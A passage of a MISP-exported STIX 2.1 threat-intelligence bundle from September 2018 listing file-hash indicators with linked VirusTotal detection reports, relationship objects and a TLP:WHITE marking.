"indicator--33e723b8-2142-46a4-8eae-c311211ea8a0", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:09.000Z", "modified": "2018-09-19T05:21:09.000Z", "pattern": "[file:hashes.MD5 = '9d080aa27da74e146a45b56c86476f20' AND file:hashes.SHA1 = '115bda02fd2807bd0e9645656c378bf1b145b4b8' AND file:hashes.SHA256 = 'dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:09Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:08.000Z", "modified": "2018-09-19T05:21:08.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T11:41:09", "category": "Other", "uuid": "3d949d3f-cbed-49eb-b6d4-76efa21d3605" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/dcd37e5b266cc0cd3fab73caa63b218f5b92e9bd5b25cf1cacf1afdb0d8e76ff/analysis/1537270869/", "category": "External analysis", "uuid": "120a5e8e-d241-45d1-a52a-b20a69c69c21" }, { "type": "text", "object_relation": "detection-ratio", "value": "21/58", "category": "Other", "uuid": "6522271c-6206-43b8-bed9-2ee6b928da31" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:12.000Z", "modified": "2018-09-19T05:21:12.000Z", "pattern": "[file:hashes.MD5 = 
'2d39b1792b263eba084e10c54e053d84' AND file:hashes.SHA1 = '1468eac59bd43901de82389276bded18202f799f' AND file:hashes.SHA256 = 'f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:12Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:10.000Z", "modified": "2018-09-19T05:21:10.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T18:34:30", "category": "Other", "uuid": "9c2f0268-084d-401f-a118-859baa7da926" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/f808a42b10cf55603389945a549ce45edc6a04562196d14f7489af04688f12bc/analysis/1537295670/", "category": "External analysis", "uuid": "92b34d76-149f-4fab-a1c0-3d1fab052d39" }, { "type": "text", "object_relation": "detection-ratio", "value": "15/58", "category": "Other", "uuid": "7c1e81fd-a762-4c8c-910f-e10d7da374bd" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--93747f03-1eec-47e4-82bc-29b8356a4961", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:14.000Z", "modified": "2018-09-19T05:21:14.000Z", "pattern": "[file:hashes.MD5 = '7b5008d312465307905d96b4b8366326' AND file:hashes.SHA1 = 'a0a5d9fc4ce11f9069a64229cef52ba707027546' AND file:hashes.SHA256 = '0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641']", "pattern_type": "stix", "pattern_version": "2.1", 
"valid_from": "2018-09-19T05:21:14Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:12.000Z", "modified": "2018-09-19T05:21:12.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T05:11:59", "category": "Other", "uuid": "344f34ab-206c-4ca6-857f-f038049eeca8" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/0b9c54692d25f68ede1de47d4206ec3cd2e5836e368794eccb3daa632334c641/analysis/1537333919/", "category": "External analysis", "uuid": "b42f45b5-2c58-4b38-a615-c6c66fd48dcb" }, { "type": "text", "object_relation": "detection-ratio", "value": "10/58", "category": "Other", "uuid": "647a2027-5c6b-4ee2-a934-fe17edc10ae7" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:16.000Z", "modified": "2018-09-19T05:21:16.000Z", "pattern": "[file:hashes.MD5 = 'e158c98a90cc7b14d026443cbcd8b520' AND file:hashes.SHA1 = '0c00df2bee83f9f7c6f2be3d9dd7557e9410a579' AND file:hashes.SHA256 = 'a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:16Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", 
"spec_version": "2.1", "id": "x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:15.000Z", "modified": "2018-09-19T05:21:15.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T18:31:13", "category": "Other", "uuid": "3eecf2ce-db49-433d-8296-a664cf52841e" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/a27acc07844bb751ac33f5df569fd949d8b61dba26eb5447482d90243fc739af/analysis/1537295473/", "category": "External analysis", "uuid": "5e7593ee-fbb7-411a-8578-ed90875953e3" }, { "type": "text", "object_relation": "detection-ratio", "value": "14/58", "category": "Other", "uuid": "585e2605-9a59-4405-b604-1d36a87903e8" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--45a9a837-c3c8-436c-a546-30547955ba2c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:19.000Z", "modified": "2018-09-19T05:21:19.000Z", "pattern": "[file:hashes.MD5 = '3b5baecd61190e12a526c51d5ecccbbe' AND file:hashes.SHA1 = '422288eb6941cee899c1046ccfcd94681b36230a' AND file:hashes.SHA256 = 'f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:19Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:17.000Z", "modified": "2018-09-19T05:21:17.000Z", "labels": [ 
"misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T03:31:11", "category": "Other", "uuid": "f817657f-fa64-46b2-83d0-5baddd55e755" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/f888dda9ca1876eba12ffb55a7a993bd1f5a622a30045a675da4955ede3e4cb8/analysis/1537327871/", "category": "External analysis", "uuid": "8e6ad2e0-623d-4a80-a8d1-9fd46979f486" }, { "type": "text", "object_relation": "detection-ratio", "value": "10/58", "category": "Other", "uuid": "1605e2ae-c2cb-4ec7-83b8-eae5be80768c" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--d3df327a-fc5e-422f-a7a1-56849a91787a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:21.000Z", "modified": "2018-09-19T05:21:21.000Z", "pattern": "[file:hashes.MD5 = '50ab7c696ca74e8ae322855d445e0613' AND file:hashes.SHA1 = 'b8b0226fb4f945b68d222c62ebb02f00874f379c' AND file:hashes.SHA256 = 'de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:21Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:19.000Z", "modified": "2018-09-19T05:21:19.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T10:58:17", "category": "Other", "uuid": "9229de7c-a78d-4c5e-9a03-a80669988b10" 
}, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/de63ce4a42f06a5903b9daa62b67fcfbdeca05beb574f966370a6ae7fd21190d/analysis/1537268297/", "category": "External analysis", "uuid": "69b5bea2-6731-4815-a928-fee550c759e4" }, { "type": "text", "object_relation": "detection-ratio", "value": "20/58", "category": "Other", "uuid": "e36c477b-83aa-479a-ab23-212692965f2e" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--14197298-00cc-4d59-85a6-5cf1be917b5c", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:23.000Z", "modified": "2018-09-19T05:21:23.000Z", "pattern": "[file:hashes.MD5 = '56303f9c9b3ec89f4a883a4d7b079f65' AND file:hashes.SHA1 = '4f0d4dc8cf49e2deff34e00e362bbc81dbef1f8d' AND file:hashes.SHA256 = '7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:23Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:22.000Z", "modified": "2018-09-19T05:21:22.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T05:10:00", "category": "Other", "uuid": "e412a478-b0ac-46aa-af48-a19eb9484d6e" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/7a18c7bdf0c504832c8552766dcfe0ba33dd5493daa3d9dbe9c985c1ce36e5aa/analysis/1537333800/", "category": "External analysis", "uuid": 
"7149939a-1c5a-4b67-8ae0-edd23d9c4473" }, { "type": "text", "object_relation": "detection-ratio", "value": "12/58", "category": "Other", "uuid": "c5156a8e-63da-4dca-af17-fe34c7991169" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:25.000Z", "modified": "2018-09-19T05:21:25.000Z", "pattern": "[file:hashes.MD5 = '55142f1d393c5ba7405239f232a6c059' AND file:hashes.SHA1 = 'effa37b97174802f17f3c75f25928226b7cd80ba' AND file:hashes.SHA256 = 'e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:25Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:24.000Z", "modified": "2018-09-19T05:21:24.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T18:37:52", "category": "Other", "uuid": "d289e539-f5be-4002-9ae9-d3bf3a0c4b6c" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/e59be6eec9629d376a8a4a70fe9f8f3eec7b0919019f819d44b9bdd1c429277c/analysis/1537295872/", "category": "External analysis", "uuid": "9f4ff50c-787c-4ffe-bde1-c802d2f1a658" }, { "type": "text", "object_relation": "detection-ratio", "value": "11/58", "category": "Other", "uuid": "433d9d46-b96e-4c76-9134-de36185263bb" } ], "x_misp_meta_category": "misc", "x_misp_name": 
"virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:28.000Z", "modified": "2018-09-19T05:21:28.000Z", "pattern": "[file:hashes.MD5 = '601080e36cd6a757684e0996afd9a0e6' AND file:hashes.SHA1 = 'e818a9a229d93e6bfe0285c8a155dcaceb03b03d' AND file:hashes.SHA256 = 'd7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:28Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:26.000Z", "modified": "2018-09-19T05:21:26.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T03:31:25", "category": "Other", "uuid": "f49f7c54-6abf-441e-af78-252779b3999b" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/d7fbd2a4db44d86b4cf5fa4202203dacfefd6ffca6a0615dca5bc2a200ad56b6/analysis/1537327885/", "category": "External analysis", "uuid": "4fdb1fd9-d5e9-4521-818f-912d41c677bd" }, { "type": "text", "object_relation": "detection-ratio", "value": "2/58", "category": "Other", "uuid": "e8a2ade3-e01e-4b65-ad3c-87d11345213f" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:30.000Z", "modified": 
"2018-09-19T05:21:30.000Z", "pattern": "[file:hashes.MD5 = '3a3ae909caee915af927c29a6025d16c' AND file:hashes.SHA1 = '81e7207f502229769d2d7979f88235261053c24b' AND file:hashes.SHA256 = '31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:30Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:29.000Z", "modified": "2018-09-19T05:21:29.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T03:31:19", "category": "Other", "uuid": "9707f2d5-8180-48c6-80e2-025cf0854494" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/31155bf8c85c6c6193842b8d09bda88990d710db9f70efe85c421f1484f0ee78/analysis/1537327879/", "category": "External analysis", "uuid": "a826a3c1-863e-4783-a3d7-6681f99f56c4" }, { "type": "text", "object_relation": "detection-ratio", "value": "42/67", "category": "Other", "uuid": "13fdd406-d4b9-4915-b544-d01eafb9c379" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--f092ea7b-05e2-4d29-8196-a214407feb5e", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:33.000Z", "modified": "2018-09-19T05:21:33.000Z", "pattern": "[file:hashes.MD5 = '1ef7d145bf7153292ea33fe7c900ece9' AND file:hashes.SHA1 = '8f0323e577d4df82c7faa4cd6ba7303b38b6a26e' AND file:hashes.SHA256 = 
'ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:33Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], "labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:31.000Z", "modified": "2018-09-19T05:21:31.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-19T03:31:28", "category": "Other", "uuid": "2a60357e-ee2f-464b-94fe-aaecf41cc0dd" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/ece3cfdb75aaabc570bf38af6f4653f73101c1641ce78a4bb146e62d9ac0cd50/analysis/1537327888/", "category": "External analysis", "uuid": "7a27e755-1f59-493b-9614-e9179f2be1e6" }, { "type": "text", "object_relation": "detection-ratio", "value": "38/66", "category": "Other", "uuid": "eb43528e-3ebb-45ba-a024-ab76913aa644" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "indicator", "spec_version": "2.1", "id": "indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "pattern": "[file:hashes.MD5 = 'a6484c6e007b1277164dd49115e5e271' AND file:hashes.SHA1 = '0308aaea4d969bc7fe4391e86b14c4908ab6adbe' AND file:hashes.SHA256 = '09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885']", "pattern_type": "stix", "pattern_version": "2.1", "valid_from": "2018-09-19T05:21:35Z", "kill_chain_phases": [ { "kill_chain_name": "misp-category", "phase_name": "file" } ], 
"labels": [ "misp:name=\"file\"", "misp:meta-category=\"file\"", "misp:to_ids=\"True\"" ] }, { "type": "x-misp-object", "spec_version": "2.1", "id": "x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a", "created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f", "created": "2018-09-19T05:21:33.000Z", "modified": "2018-09-19T05:21:33.000Z", "labels": [ "misp:name=\"virustotal-report\"", "misp:meta-category=\"misc\"" ], "x_misp_attributes": [ { "type": "datetime", "object_relation": "last-submission", "value": "2018-09-18T12:02:50", "category": "Other", "uuid": "2b1a7a8f-99fc-4684-98e7-f38d718555a8" }, { "type": "link", "object_relation": "permalink", "value": "https://www.virustotal.com/file/09968c4573580398b3269577ced28090eae4a7c326c1a0ec546761c623625885/analysis/1537272170/", "category": "External analysis", "uuid": "7d67a45d-37b8-4972-93be-68eb79124851" }, { "type": "text", "object_relation": "detection-ratio", "value": "20/58", "category": "Other", "uuid": "f916ec81-9212-4dc6-bef9-dc7982bd15a3" } ], "x_misp_meta_category": "misc", "x_misp_name": "virustotal-report" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--62c44254-dfdd-46a5-8405-b822bd1e8729", "created": "2018-09-19T05:21:34.000Z", "modified": "2018-09-19T05:21:34.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--9fb96957-5ea7-449a-bbd2-ff71922b5a6e", "target_ref": "x-misp-object--7c26518e-fa7a-453f-a4cd-e234d2520d3e" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9d3348b4-1d0b-4747-a234-795e33e1f48d", "created": "2018-09-19T05:21:34.000Z", "modified": "2018-09-19T05:21:34.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--d33ee6ee-437e-4ce5-ab11-837fee0edc8c", "target_ref": "x-misp-object--6836f38c-a2eb-4f7c-9055-2ffb96e7c45e" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--3a5866c4-e62f-456c-822c-e656cef75d59", "created": "2018-09-19T05:21:34.000Z", "modified": 
"2018-09-19T05:21:34.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--edd4b990-82be-4e5e-858f-50bbd7222f03", "target_ref": "x-misp-object--54646fe4-9b9d-470a-9042-d446a90a15a5" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2bb4017d-0fb8-43bb-ad98-dcb648150f8e", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--33e723b8-2142-46a4-8eae-c311211ea8a0", "target_ref": "x-misp-object--87558dd2-f70c-49b7-b710-6666909e0e91" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--97dce8d6-48a2-4712-bd1a-378edec44abe", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--d88b602b-394b-4c46-92fd-b776ed9ef8d9", "target_ref": "x-misp-object--3df3df12-3458-48cc-9031-686fefeaf564" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--dee4280e-6cd1-49c5-ac6b-ac955a20ac7f", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--93747f03-1eec-47e4-82bc-29b8356a4961", "target_ref": "x-misp-object--59d3e161-919f-486a-bb7b-f4010360c91c" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9d97e294-b4a5-4bdf-8a6d-4776f616c0fc", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--a1f90b96-d2ce-46d4-a059-5efedbb57e07", "target_ref": "x-misp-object--7b042050-b92e-404c-87e8-107c8986e1d7" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6ca72a98-d5a6-4f61-a834-e223a1ec6196", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--45a9a837-c3c8-436c-a546-30547955ba2c", "target_ref": 
"x-misp-object--6beca7d0-c2fe-4742-b58a-014a7f542862" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9c8ea731-f63c-430e-a0bc-8211fdd56f51", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--d3df327a-fc5e-422f-a7a1-56849a91787a", "target_ref": "x-misp-object--84cc3152-b806-4ef9-a3c4-e96e0b39f86d" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9a77cf06-e5bc-4fa3-b678-1dd099ee5926", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--14197298-00cc-4d59-85a6-5cf1be917b5c", "target_ref": "x-misp-object--e3c55821-3317-4be2-8eef-60d480f1737e" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--d20dc510-00b2-4562-862d-af956e2cd62b", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--03ebd023-1b57-415f-8a97-f37f6b1095ba", "target_ref": "x-misp-object--8755454f-61de-4423-a149-1d7ba841b7c3" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--2dd0a986-b772-4b30-b878-9e1e211e7482", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--0fea2aef-bf8b-40d9-a152-3ef21cef0096", "target_ref": "x-misp-object--c6512ad6-0d9d-4082-abcc-a5fa2c6ed93a" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--9cf5bd76-c761-4c60-91e8-15d6ff2b8574", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--faeff86b-7e43-4c04-b688-b6be1f62faaa", "target_ref": "x-misp-object--ebb05fd0-b56c-4384-bde9-b8e540af4c63" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--6dab5053-03e3-46d0-88a7-7d3e26d63c5a", "created": 
"2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--f092ea7b-05e2-4d29-8196-a214407feb5e", "target_ref": "x-misp-object--0483921b-12e2-450d-97c6-543e513e4a6a" }, { "type": "relationship", "spec_version": "2.1", "id": "relationship--7c1e196f-cc4d-4015-b169-1633c85a3da6", "created": "2018-09-19T05:21:35.000Z", "modified": "2018-09-19T05:21:35.000Z", "relationship_type": "analysed-with", "source_ref": "indicator--9b4f7e14-e26f-4b8e-95a6-a5494c397ad0", "target_ref": "x-misp-object--871efca7-2ad6-4bfe-a116-dcd8cf14fb6a" }, { "type": "marking-definition", "spec_version": "2.1", "id": "marking-definition--613f2e26-407d-48c7-9eca-b8e91df99dc9", "created": "2017-01-20T00:00:00.000Z", "definition_type": "tlp", "name": "TLP:WHITE", "definition": { "tlp": "white" } } ] }